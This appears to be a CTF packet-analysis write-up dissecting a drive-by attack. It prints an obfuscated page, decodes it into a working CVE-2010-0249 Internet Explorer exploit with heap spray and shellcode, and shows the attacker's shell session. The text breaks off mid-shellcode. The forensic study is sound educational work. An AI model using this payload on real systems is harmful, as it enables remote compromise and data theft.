OWASP AppSec USA 2011 CTF Pre-conference Challenge #1 - May 2011

This post is about Pre-conference Challenge #1 from the OWASP AppSecUSA 2011 CTF.
The challenge's packet capture file

To try this challenge on your own, download the packet capture, study it, and try to answer the following questions:
Which IP addresses were involved?
What URL(s) was (were) requested?
What exploit was used?
What information was taken?

It is a packet-analysis challenge: find the IP addresses, the URL, the vulnerability that was exploited, and what information was taken.
Just by looking at the capture in Wireshark you can see the IP addresses, the URL, and what information was taken.
Skimming the packets, the flow appears to be: the browser accesses the server, an attack exploiting a vulnerability is carried out, and a shell is obtained.
IP addresses appearing in the capture

  • 192.168.1.50 (Windows client)
  • 192.168.1.5 (web server)

The HTTP request line sent by the client is

GET /zezevAs9up49EdRema/ HTTP/1.1

so the URL is http://192.168.1.5/zezevAs9up49EdRema/

After that there is further HTTP traffic, and following the TCP stream in the later packets shows:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>cd c:\windows\temp\

C:\WINDOWS\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 4C5C-C58A

 Directory of C:\WINDOWS\Temp

04/27/2011  11:26 PM              .
04/27/2011  11:26 PM              ..
03/06/2011  11:55 PM            16,384 Perflib_Perfdata_49c.dat
04/27/2011  05:37 PM            16,384 Perflib_Perfdata_5f0.dat
04/27/2011  05:37 PM            16,384 Perflib_Perfdata_668.dat
03/07/2011  12:07 AM            16,384 Perflib_Perfdata_66c.dat
03/07/2011  12:03 AM            16,384 Perflib_Perfdata_6ac.dat
04/27/2011  11:26 PM            27,722 T0ps3(r3t.txt
               6 File(s)        109,642 bytes
               2 Dir(s)   2,654,466,048 bytes free

C:\WINDOWS\Temp>type T0ps3(r3t.txt
z@.......P..,NK...KF............8D.;
(snip)

So the information that was taken is

T0ps3(r3t.txt (Topsecret.txt), but its contents appear to be encrypted, so as-is it is not clear what the data is.
Now, to identify the vulnerability used in the attack, let's follow the HTTP exchange.
In response to the client's request, the server returns

HTTP/1.1 302 Moved
Location: /zezevAs9up49EdRema/?BsUwDJHBAyEvtyJToa
...

Since it is a 302 Moved, the client treats it as a temporary redirect and issues the following request:

GET /zezevAs9up49EdRema/?BsUwDJHBAyEvtyJToa HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 11937
Pragma: no-cache
Server: Apache
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
  var zR = '3412275701301a0b320f3f26111a0b21031b0e111739301c3c240a2a133e15332b1e3e33352a1c11362b0d13093d03201b0f3b13012f3b5368576609070f0c3c0b2256423c351d410c21070d11082b2832090e390e3b041f012e252b2f062c291b04102b1c37002d29162a2a16003f271219050f140f312f0d121e302d260a1702316477682c240e6537060b2b2d474879153a05646221627c59754d54106a684f507143654c6423636968020b2426031f160c0b31031e383e0806092f36222e0e0822373c2713210c36301e2b00043211051e291c07222c1705212e3d211c26033e0d12233f113d32417f533118273f25272f0d6b15061c2b200a242e1638122a3e60073b2b0c0502031a310c20371f2f3b26080636170d233d272f02352500082207001d032e30203c143e303f1c3b1910051d1b0e6d7106101303103417133924242e38311b3c2a052f1a3b082d15273f1b0636203627363501011c312b29132539341f221b383b180113060d0026163f1e1f29572e351b00624e75550f0c04607a04331706593a250211061c3135062612270f09360c1d1528352638301f10322c002630060d062327203b1b280313151e071e0c293717031507272b080027332d1e0725211f020c0e3a011b0e17021c1c14310612016477682c3415294d0218387419280021271b3d3a1f3b2f3611262e112d0c1e241529100f353b042c38310b053b311b320b3923023f1b3d280631123c2831252b331d2d351827754a64242d35613837041500627d54172301753e1519061a0f1d1d27333632301f3437373a06341c01260f0b021b1934322637252337331d2d13121134121237050c18011622213f2c2e12201d253b1c3715203025062419243f3d00340b090b0a3c30131c113d11252f2d0a231c647768372f1c361515092f6f09142c10211e2b24680b2d152b3c303a0c18372e383e020728280c37250a15273e3f1a3d3c162c030627281f20050d0a212c1c2e19251b11331620340b2f110706516c0d021838742a34103a754a640319110f210b122c280d1b1705322620332b3b3814081d0b043314271917131a3734332220211b1b2a301d23383b213d343b30363b3d131e28141e3f13061a1e1d0033090b333b2c3d380300300e33011c223c1824083d3a0e32216062665c304f44402c711a587a433652317b7d75255c3042111b72711a5574443052317e7976785c30464c4a2c711a5871156052317b7c20275c3010104879711a5775476752317d7976765c3045104d7a711a56714a375231287d71225c304f454078711a567a41335231787c75755c3045401b7e711a5921476d52317b2c26775c3046411b7a711a0472416552317d2a75245c3045154e72711a0274153052
312f7921705c3012404a78711a5672116352317c7f75785c301415412e711a03764a6552312c2b74235c304e404d2c711a537a17635231737e24785c3046174e7d711a567340625231737b71755c3044434d7c711a5324126c52317d7b20735c3046404e2c711a5226446752312c2c73205c30174c1b7a711a597a4a6d52317b7d24745c3013474b78711a597447375231782c24795c304042407b711a5575116252317d2b76795c3047404a7f711a5073443152312f2a24765c304440492e711a0470436452317e7871275c3042114e7e711a037b11645231792b76785c3042454d2b711a56234a6252312c7e73795c304f461d7f711a0377113752317b2c7b235c304641402c711a0324476652317d7e20725c3041414b7f711a587b42365231287020245c3044174d78711a5624446352317d2976705c301447482e711a5321446252317e7176795c3041104e7f711a5673446752317d7b76235c3047164b7d711a5620156052317a7a76245c3045411c7b711a0472426c52317b7d76715c3041404072711a527545625231737120245c30414c4e7a711a512647345231787c76765c3014414028711a597247635231782c26745c304f424829711a597b4a6652312f7a26735c3013474b7b711a537744365231287020735c304f124d2c711a5070116452317a2b27235c304f461872711a5977116252317d2d26775c3047404a29711a5276113352312e797a705c3014151f73711a557043615231782e20235c304f431873711a5926116152317c7e7b705c30144d497f711a057641345231797071275c3015441f2c711a0374153652312c2c70235c3045444e73711a0372156d5231737876725c30414c4e7e711a562344365231287071255c304f4c1873711a0375116552312f7971785c3012414979711a0574416c52317e7a7b725c304f421b78711a032740615231782e75705c3041464e2e711a5872433652317e7171765c3044174e73711a04204b6652312c7d73715c3044431b7f711a0471436c52317a7d75765c304e174d79711a0721176552317b7d71745c304f46412e711a557a47375231787120705c3045121c7a711a587b456352317b7c76705c3014474b7e711a5873116c5231737f20205c3041164028711a5270446052312e7c24775c304f124d7d711a077b426c5231797920235c3014421f72711a007a416052317d7b75245c3042114829711a562444635231782c72255c3041444d7c711a072640345231282e76715c3045101b7e711a5221423152312f7a7a795c3046404f7d711a5523473352317d7a76715c304147487f711a552444635231287c7b735c304e43407c711a5073176352317e7927735c3041404e7d711a527741365231282920275c3045474a
2c711a5177153152312c7170705c304110497e711a5627476c52317b2b75715c3040431b2f711a037b11625231297972705c3015441a7d711a5375166552312c7d71235c3041154a29711a567347665231732a76795c3042114e7f711a5126406152312f7970735c3042154d28711a58734a3352312e7d70235c3042434e73711a072142345231287876735c304e104b2c711a0471406d52317d2b73255c3040424e72711a037041605231737f20745c3044104079711a03204a6c52312b7073755c30104c4b7a711a51214437523172717b715c3013161f7d711a0576456c5231287b70755c3045104e2c711a5275116d52317d7e75245c30414c4e7d711a0374476352312b717b795c30144c1b7b711a562611305231732e76735c3014124d72711a56724a3752317a2c75785c301345417c711a5375446052317b7c70755c3046411b79711a5775476452317e7175205c3014151b7c711a5123473352317c7e24225c304f474a29711a0372116c52317e787a255c304e45407c711a057717655231737870255c304f4c1b7b711a5873126c52312e7a74235c3047101c78711a587040625231737f72755c3046474e29711a0472176452317e7b76765c3014401b78711a0576426652312c7073235c3014434073711a5170126d52317a2b27725c30454d4e79711a5120153152317e2a24745c304e411b7f711a5226163752317b2b75235c3041454e2c711a5276446152312e7e70725c304e444a2c711a5670156c5231727b70275c3044171c79711a5621113752317d7b76245c3013164a7a711a5624416052317d7e76775c304145487f711a5677473452317d7c71745c304e404a2c711a0473156052312f7a73795c3013444b72711a567540365231737b76205c3041161b72711a032442605231782b75785c3042444e7a711a5126116152317d2976235c304f444b7d711a552711345231737120765c3044104e78711a5324443152317a7074765c304e101f73711a072611645231792c23795c3047404e2f711a582043605231737020235c3042474d2c711a5072446d52317a7c24795c3047174a7e711a0577423152317e7f70745c301447402c711a5275116352317e717b705c30424c4d7b711a557045635231287872225c3014414078711a0327116c5231737e23785c3010174878711a057111675231797d26775c3012404b2b711a55744161523128707b765c3040414172711a007010675231297b26785c3041401d73711a077641615231797b77245c3014451a73711a5273473752317b7a76775c3015424179711a5171436152317c2a21245c3043434b7a711a0375473352317c2924715c3015431b7a711a577043605231797021765c3041471f7c711a0373116252317e
7a73725c3017421c7f711a0775466552312b2b71785c3010404a7f711a047211675231722e23255c3044171b7c711a527a106452317a2a75225c30144d1c29711a5871116452317d2923735c3040121d7a711a0027116c52317f7971735c3017474e78711a5874406652317e2b74275c3042124f7b711a0724153752312f7c7b745c3015471b73711a53234a6152317d2b20775c3042121c2f711a517a436c52317f7976755c3017454c2b711a507b17665231297176735c30144d1b28711a502744665231727e26795c3044164a2b711a5621413452312c2c20255c3041104f79711a02734b3352317e7870275c3015174a2c711a597641305231782e24795c3010114d7f711a057015345231297d77255c30464c417b711a057a166d52312e2970735c30454d4d2b711a512417675231292972225c3013401d72711a5876463752312c2a24225c3017114172711a5672156c52317c7970275c3015474172711a007743375231737826715c3010174a78711a5675113652317b2d76235c3044434872711a5476166c5231792b7a235c3045424128711a077310615231297023705c304f11487e711a0320116752317a7970775c3043404f72711a0223433752312b7b20775c3013454f29711a5220433052317a297b725c3047414f2f711a5427466552317a2c71245c3012124e7b711a0226176052317a2975245c304f114e73711a0477176552317e2d71785c304341407b711a597617645231727173245c3017421a7b711a0070156152317f2b74235c304617402c711a5424106652312f7d77205c304044487b711a007b44605231727e7b225c304245482c711a5073106d52312c707a795c30134d4c7b711a5176416c5231737f76225c304e114f2b711a5775456752317c7f70755c304116492c711a597517645231787977205c304f434e7e711a5521446452317a2c75785c3015434e2e711a037b41305231792d75275c3040424872711a50774b6552312b2e73735c301242487e711a0572473152312e7e24795c304e42412e711a05744a6752317d2d27745c304e401a7c711a597342655231287026725c3047404172711a047a17375231282d75255c3047421b79711a597a463752312f7073225c30464c412f711a522445645231722d24765c3045414079711a54714237506d713e2333590a1e360e322c290324052011250f2b3b3623163d190e3c171b28202003212b0020151403271d17142d04080c0711053e05232a1129110656495903053c2f1a3d312f150d073a2509100330163b243928263d27302927053a33210117301f203d363b11063e20053b3d101400061538001302053425093005271e012d13323d1038113d242e200b3810022122203504330b190d0f217c
4f436751755c64683d6061526554445b6a7f4f432151755c6468786061526554105b6a7f4f43670677576f6a6a7263596e56561a68744441604377576f6a6a2663596c4d10166a2f4f2e2a31220f3c0c2a24370c2317311a33233532091e2201073e0120122f13193e111d01150329103810142d250723290c371d1b193c0722625868570b220a3539010314120f3f320e24210a222d17012535373a313f162a1c02002b2a24000d26212b2f2629221b311b1a1d2e0820203d1f076a356236112c1a11516a1b0723350b2d31262c3e37271800150d0e1007240c350516030d281b1417160f1e232c303604022f140510290f2a1208382c1427112217410d271d32032c6a74627101214644497a74465a241c27576c3b2701081311131d3f0c3a1e390f032107030404062a32110f2d2e0c2008142807754a647a73623016063f1e2d2f3d29272c020d3a343e38050f35011d3f2d330d38273614201d306a7462704c754d54082517260b16163c310224391a0c09310633370610042a160a0c20023e2f372b0d6e5d5d593c1d2d33301f2c071333260d15291f1e13213b11383b070b24060824310a0f0a0a3e251f2e0c0e10281f2c150a391b072c3e14240d300800353519023a340d201c27283f0318052107241b11053d19332f011c3b182e0302130c202032417f531a1f063d303a071b2300011f2b110c183529063c293d3e0135302725222f251e07361709371c27272f122614001424300b3d0d322a1b16576f6a0d1713307e0b120c24371b082d1d753a05010b312937285e2c2a183c36070f0517110228302e05103c1c36383a1f04292803031f163b2e380a3a153d3737027d14282e1f3b3d00090e0e19363f3b230926362b14260005260e0c182b120e2b062729260107260e00312d2c1d1b3335093413013a05313624055b7c4c343b25320516213436151031211131093c1b262b011b331500331c33242628150126062e35050f20101f0e062e3f2b21391b12020625061e00102e141724112c001a2022061e2f190c023b37320c020054446a300002371e301930642b3024183113310f2f3a1b2e201930143062101113111c10390f083229033a1f111e3d200a0331322e3e1e091c3c3d1024091e3414010b0c09507e121b1a3f390a0f365d3212300f24272c1c2b023600033047430b3f241f171c11011529303b2c003f1d04390c39120317231204240d1d141501333e3e0c163837152e1a223a1728292e2401061a3b0e35241e0731023f0f02293539053a03243c2b3321313a2a3a0d0f2e2e362c1c372b240a342f302701093a242f63506b1f1a172f2627350f3f754a64686a7936102b121b0e64270a150b1d2112363c292e69152e2f2d38393e200610252f1314332938
393206150d290c07434177437c4c392c3d2c220d2c191a59263f363803003f3823181e3825293c170e0101170c181235065f6d3138627c59672a01492964093d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d72224921544f1f25264f492b5368577471682b61456538262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c7a03042c14211f7f6a21696a503e38262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c0f063c6c173403256a756231423800150b6a204f5c6203241a340e2726033b292c11373a2715082e11343e1d38240704110f18063e3e173a321b021a30261b2e0931230317012f30041e321031013f16252510131c103c3a360910021b2c3b1d0431393d0537573604173c263102042c076e0a';
  var fkOAvrfnGj = '';
  for (i = 0;i<zR.length;i+=2) {
   fkOAvrfnGj += String.fromCharCode(parseInt(zR.substring(i, i+2), 16));
  }
  var wDiQinaybhMQlGHucykGQcaeXX = location.search.substring(1);
  var ObxeUkIyK = '';
  for (i=0;i<fkOAvrfnGj.length;i++) {
   ObxeUkIyK += String.fromCharCode(fkOAvrfnGj.charCodeAt(i) ^ wDiQinaybhMQlGHucykGQcaeXX.charCodeAt(i%wDiQinaybhMQlGHucykGQcaeXX.length));
  }
  window["eZRSOvZRSOaZRSOl".replace(/[A-Z]/g,"")](ObxeUkIyK);

</script>
</head>
<body>
<span id="ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm"><iframe src="/zezevAs9up49EdRema/cOAOxcSWijvvy.gif" onload="MAKCshNm(event)" /></span></body></html>
</body>
</html>

Let's look at the JavaScript inside this response.
The variable names are long and make the code hard to read, so I'll give them some more descriptive names.

// A string of hexadecimal digits
var zR = '...'; // the long hex string from the response above, omitted here
var xorEncrypted = '';

for ( i = 0 ; i < zR.length ; i += 2 ) {
  xorEncrypted += String.fromCharCode( parseInt( zR.substring( i, i+2 ), 16 ) ); // convert the hex string into its raw bytes
}

var locate = 'BsUwDJHBAyEvtyJToa';     // = location.search.substring(1);
var exploitcode = '';

// the original loops over the whole decoded buffer, not just the key length
for ( i = 0 ; i < xorEncrypted.length ; i++ ) {
  // decrypt the bytes by XORing them with the repeating locate string (the query string from the redirect)
  exploitcode += String.fromCharCode( xorEncrypted.charCodeAt(i) ^ locate.charCodeAt( i % locate.length ) );
}

window["eZRSOvZRSOaZRSOl".replace(/[A-Z]/g,"")](exploitcode); // window["eval"](exploitcode);

Now that the overall flow is clear, let's use a debugger such as Firebug to look at the string held in exploitcode, which is finally passed to eval.

var EzRIsvzPecAulzLbBNtVtfKSVHaJaJQRwYIfraEQHDFVovqGnNy = "COMMENT";var NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF = new Array();for (i = 0; i < 1300; i++){NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i] = document.createElement(EzRIsvzPecAulzLbBNtVtfKSVHaJaJQRwYIfraEQHDFVovqGnNy);NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i].data = "KFL";}var pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv = null;var vIBRrlypWynOTPZhgXqEWZExqqLnyHNsOHQfdXaqjlybNsSEmGQRyIBTZT = new Array();var IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk = unescape;function IllnJDCFLXOzMWplbDudsPQJFPiSwnpSPlUhGLsdZhWSqtpqeuCOeYEG(){var EURI = IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk( '%u909f%u980c%u157d%u4eb8%u467e%u4149%u083f%u93f5%u14bf%ufd13%u6742%u7147%u3d40%u739b%ub53c%u9192%u782f%u2474%u34b4%u8c48%u1dd6%u05b0%ue020%u7b7e%u3a78%uc6fe%ue1c1%ud432%u70b6%u6779%uba8d%ub490%ufc6b%u844f%u28d6%u96f9%u0c77%u7137%u9334%u2746%u2fa9%u73b2%u047f%u3d72%ufd1a%ua8b0%u8898%u15f5%ue322%u864b%u2df8%u6691%u47b7%u7c48%u1435%u117d%uebf7%u240d%ue201%u403f%u4e74%ub9b1%u3c49%u414a%u7a97%uf618%u92d5%ub5bb%u1d9b%u059f%ubf43%u76b3%u7525%u991c%ub8be%u2c42%u7f76%u7a41%ub31d%u2c77%u4948%u7d75%u7172%u734b%u1b27%u7bf5%u024e%u35e1%ue019%u1540%u7498%u3767%u99be%u7870%u0d4a%u2447%ub59b%u8046%u2dd5%u961c%u8993%ue2d2%ue321%u257c%ub8b2%u9f4f%u12b1%u0ceb%u92a8%u85b7%u7ed6%u143c%u34bf%ud181%ubaf9%u4204%u2fbb%u97a9%u8db4%u6691%ub905%ud42a%u383f%uc0ff%ub6fc%ufd2b%u3079%ub0f8%u9043%u7874%u7a7c%ub83d%u98a9%ub7b0%ue139%ud503%ud629%u4293%u96b2%ube34%u2f71%u727d%u900c%u4937%u2c79%ueb83%uf510%u27b5%ue309%u0577%u8c43%ufcd0%u1535%u928d%u484b%u29b1%u3fe0%u9966%u1441%ub324%u91b9%u97ba%u7b9b%u3275%ud4f6%u9f47%uf919%u31bb%ub6f8%ua825%u737e%u4e1c%u7f76%u2d0d%u7046%ufd3a%ubf40%u3db4%u3c1d%ue288%u0467%u4a4f%u7240%u7315%u4f76%ub492%u8796%u11d6%u41e2%u7477%u352c%ubabf%u333f%u05f
d%uf921%u7d04%u7e49%u1c70%u67be%ub9b7%uc101%uc0c7%u27e0%uf53b%u7a3c%u7143%u9b48%u4e75%u0d34%ue122%u4a4b%u919f%ud52b%u4779%ufc1a%ub042%u8d2f%ue338%u7c1d%u6678%ub225%u97b5%u2d93%ubb99%ua814%uf820%u0c7b%u8990%uebf7%ud469%ub324%u3d7f%u37b8%u767e%u7877%ub646%ua998%ub8b1%u7dbe%u9f42%ubf48%u709b%u0d79%ue186%u2775%u1424%u05b3%u6741%u497a%ubab6%u0a4f%u66fc%u933c%ub0b9%u408d%u8196%ud5d0%u902d%u98b1%u91a9%ud26b%u1de2%u9237%u9704%u037c%ue0d1%u4347%ub4b2%ud413%uf81b%ub799%u02a8%u0ce3%u3973%u0bfd%u4bf5%u85b5%u3deb%u1c7b%u717f%u3474%ud623%u803f%u72f9%u832f%u2ce3%u7cbb%u734e%ueb30%u7f25%u7646%u7115%u754a%u7435%u843f%ue1f5%ue218%ue028%u773c%u934a%u7bb8%ubf15%u2c79%u4070%u0db4%u7a4b%u9027%u4eba%u99b7%u2d72%u2f7d%u0867%u8df9%ufdb1%u3da8%u147e%u9b05%u98bb%u434f%u1078%u04f8%u1c34%ud51d%u4725%ub39f%u37b6%u4991%u4841%u4266%ub00c%ub592%ubeb9%u96a9%ufc12%ud3b2%u35d6%ud42a%u4624%ub897%u6588%ua2c2%uc3d9%u74d9%uf424%u335e%ub1c9%u314b%u1246%uc683%u0304%u6bce%u5720%ub74f%u6af0%uc7b0%u6205%u38c7%u73f6%ub1b7%u4213%ua6e5%uf750%uac39%uf435%ue0b2%u8fad%u2cb6%u38c1%u0b7c%ub9ec%u93b1%u7aa2%u6fd0%uaeb9%u5132%ua372%u9633%u4c6f%u4f61%ufffb%ue495%uc3b9%u2a94%u7cb6%u4fee%u0809%u5144%ua15a%u19d3%uc942%ub9bb%u1e73%u86d8%u2b3a%u7c2a%ufdbd%u7d63%uc18f%u402f%ucc3f%u842e%u2ff8%ufe45%ud2fa%uc55d%u0881%ud8e8%uda22%u394a%u0fd2%uca0c%ue4d8%u945b%ufbfc%uae88%u70f9%u612f%uc388%ua50b%u90d0%ufc32%u77bc%u1e4b%u2718%u54e9%u3c8b%u368b%uf1c4%uc8a1%u9e14%ubbb2%u0126%u5468%uca0b%ua3b6%ue16c%u3b0e%u0a93%u156e%u5e50%u0d3e%udf71%ucdd5%u0a7e%u9e79%ue5d0%u4e39%u5591%u84d1%u891e%ua6c1%ua2f4%u5c6b%u0c9f%u5fc3%ue55a%u6011%ua975%u869c%u411f%u11c8%uf888%ue951%u0429%u974c%u8e6a%u6762%u6724%u7b0f%u87d1%u215a%u9774%u4c71%u0d79%uc77d%ub92e%u3e7f%u6618%u1580%uaf12%ud614%ud04d%ud6f8%u868d%ud692%u7ee5%u84c6%u8110%ub8d3%u1488%ue8db%ube7d%u16b3%u885b%ue81c%u088e%u3f61%u8ef7%u3593%u531b');var OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC = IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk( "%" 
+ "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );do { OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC += OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC } while( OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC.length < 0xd0000 );for (qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt = 0; qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt < 150; qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt++) vIBRrlypWynOTPZhgXqEWZExqqLnyHNsOHQfdXaqjlybNsSEmGQRyIBTZT[qoCIjTeiFFnqXMptpGNLDkKTyYWFtgujt] = OhBwxxFbfvufaEcywZSKmwvCtIbSVVoJhWUzbkcmgPgmEbPIAibShhC + EURI;}function MAKCshNm(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH){IllnJDCFLXOzMWplbDudsPQJFPiSwnpSPlUhGLsdZhWSqtpqeuCOeYEG();pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv = document.createEventObject(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH);document.getElementById("ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm").innerHTML = "";window.setInterval(lkYYAsjOgRVzdPyazxKCcyPFS, 50);}function lkYYAsjOgRVzdPyazxKCcyPFS(){p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";for (i = 0; i < NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF.length; i++){NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i].data = p;}var t = pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv.srcElement;}

When I saved this as a new file, exploit.js, the antivirus software reacted, and that is how I learned it is an exploit for the CVE-2010-0249*1 vulnerability.
Reformatted, it looks like this:

var comment = "COMMENT";
var array1 = new Array();
for ( i = 0 ; i < 1300 ; i++ ){
  array1[i] = document.createElement(comment);
  array1[i].data = "KFL";
}
var eventObject = null;
var array2 = new Array();
var funcUnescape = unescape;

function func1(){
  var EURI = funcUnescape( '%u909f%u980c%u157d%u4eb8%u467e%u4149%u083f%u93f5%u14bf%ufd13%u6742%u7147%u3d40%u739b%ub53c%u9192%u782f%u2474%u34b4%u8c48%u1dd6%u05b0%ue020%u7b7e%u3a78%uc6fe%ue1c1%ud432%u70b6%u6779%uba8d%ub490%ufc6b%u844f%u28d6%u96f9%u0c77%u7137%u9334%u2746%u2fa9%u73b2%u047f%u3d72%ufd1a%ua8b0%u8898%u15f5%ue322%u864b%u2df8%u6691%u47b7%u7c48%u1435%u117d%uebf7%u240d%ue201%u403f%u4e74%ub9b1%u3c49%u414a%u7a97%uf618%u92d5%ub5bb%u1d9b%u059f%ubf43%u76b3%u7525%u991c%ub8be%u2c42%u7f76%u7a41%ub31d%u2c77%u4948%u7d75%u7172%u734b%u1b27%u7bf5%u024e%u35e1%ue019%u1540%u7498%u3767%u99be%u7870%u0d4a%u2447%ub59b%u8046%u2dd5%u961c%u8993%ue2d2%ue321%u257c%ub8b2%u9f4f%u12b1%u0ceb%u92a8%u85b7%u7ed6%u143c%u34bf%ud181%ubaf9%u4204%u2fbb%u97a9%u8db4%u6691%ub905%ud42a%u383f%uc0ff%ub6fc%ufd2b%u3079%ub0f8%u9043%u7874%u7a7c%ub83d%u98a9%ub7b0%ue139%ud503%ud629%u4293%u96b2%ube34%u2f71%u727d%u900c%u4937%u2c79%ueb83%uf510%u27b5%ue309%u0577%u8c43%ufcd0%u1535%u928d%u484b%u29b1%u3fe0%u9966%u1441%ub324%u91b9%u97ba%u7b9b%u3275%ud4f6%u9f47%uf919%u31bb%ub6f8%ua825%u737e%u4e1c%u7f76%u2d0d%u7046%ufd3a%ubf40%u3db4%u3c1d%ue288%u0467%u4a4f%u7240%u7315%u4f76%ub492%u8796%u11d6%u41e2%u7477%u352c%ubabf%u333f%u05fd%uf921%u7d04%u7e49%u1c70%u67be%ub9b7%uc101%uc0c7%u27e0%uf53b%u7a3c%u7143%u9b48%u4e75%u0d34%ue122%u4a4b%u919f%ud52b%u4779%ufc1a%ub042%u8d2f%ue338%u7c1d%u6678%ub225%u97b5%u2d93%ubb99%ua814%uf820%u0c7b%u8990%uebf7%ud469%ub324%u3d7f%u37b8%u767e%u7877%ub646%ua998%ub8b1%u7dbe%u9f42%ubf48%u709b%u0d79%ue186%u2775%u1424%u05b3%u6741%u497a%ubab6%u0a4f%u66fc%u933c%ub0b9%u408d%u8196%ud5d0%u902d%u98b1%u91a9%ud26b%u1de2%u9237%u9704%u037c%ue0d1%u4347%ub4b2%ud413%uf81b%ub799%u02a8%u0ce3%u3973%u0bfd%u4bf5%u85b5%u3deb%u1c7b%u717f%u3474%ud623%u803f%u72f9%u832f%u2ce3%u7cbb%u734e%ueb30%u7f25%u7646%u7115%u754a%u7435%u843f%ue1f5%ue218%ue028%u773c%u934a%u7bb8%ubf15%u2c79%u4070%u0db4%u7a4b%u9027%u4eba%u99b7%u2d72%u2f7d%u0867%u8df9%ufdb1%u3da8%u147e%u9b05%u98bb%u434f%u1078%u04f8%u1c34%ud51d%u4725%ub39f%u37b6%u4991%u4841%u42
66%ub00c%ub592%ubeb9%u96a9%ufc12%ud3b2%u35d6%ud42a%u4624%ub897%u6588%ua2c2%uc3d9%u74d9%uf424%u335e%ub1c9%u314b%u1246%uc683%u0304%u6bce%u5720%ub74f%u6af0%uc7b0%u6205%u38c7%u73f6%ub1b7%u4213%ua6e5%uf750%uac39%uf435%ue0b2%u8fad%u2cb6%u38c1%u0b7c%ub9ec%u93b1%u7aa2%u6fd0%uaeb9%u5132%ua372%u9633%u4c6f%u4f61%ufffb%ue495%uc3b9%u2a94%u7cb6%u4fee%u0809%u5144%ua15a%u19d3%uc942%ub9bb%u1e73%u86d8%u2b3a%u7c2a%ufdbd%u7d63%uc18f%u402f%ucc3f%u842e%u2ff8%ufe45%ud2fa%uc55d%u0881%ud8e8%uda22%u394a%u0fd2%uca0c%ue4d8%u945b%ufbfc%uae88%u70f9%u612f%uc388%ua50b%u90d0%ufc32%u77bc%u1e4b%u2718%u54e9%u3c8b%u368b%uf1c4%uc8a1%u9e14%ubbb2%u0126%u5468%uca0b%ua3b6%ue16c%u3b0e%u0a93%u156e%u5e50%u0d3e%udf71%ucdd5%u0a7e%u9e79%ue5d0%u4e39%u5591%u84d1%u891e%ua6c1%ua2f4%u5c6b%u0c9f%u5fc3%ue55a%u6011%ua975%u869c%u411f%u11c8%uf888%ue951%u0429%u974c%u8e6a%u6762%u6724%u7b0f%u87d1%u215a%u9774%u4c71%u0d79%uc77d%ub92e%u3e7f%u6618%u1580%uaf12%ud614%ud04d%ud6f8%u868d%ud692%u7ee5%u84c6%u8110%ub8d3%u1488%ue8db%ube7d%u16b3%u885b%u